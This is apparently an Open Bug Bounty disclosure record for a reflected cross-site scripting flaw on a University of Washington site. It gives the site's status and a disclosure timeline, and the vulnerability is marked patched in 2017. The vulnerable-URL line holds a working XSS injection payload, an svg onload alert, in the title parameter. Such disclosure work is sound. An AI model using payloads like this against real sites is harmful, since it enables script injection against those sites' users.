uwpcc.washington.edu XSS vulnerability

2016-03-07T22:23:00
ID OBB:140216
Type openbugbounty
Reporter UpAndat0m
Modified 2017-07-26T17:57:00

Description

Vulnerable URL:
http://www.uwpcc.washington.edu/links.jsp?forward=no&perPage;=24&start;=96&title;=%22%3E%3Csvg/onload=alert%28%27XSSPOSED%27%29%3E&orderBy;=category&forward;=no&entity;=PCC&action;=ListObjects&object;=link&paging;=true
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 17:57 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check uwpcc.washington.edu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 7 March, 2016 22:23 GMT
Generic security notifications sent to website owner| 7 March, 2016 22:26 GMT
Notification sent to subscribers (without technical details)| 8 March, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 14 March, 2016 23:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 17:57 GMT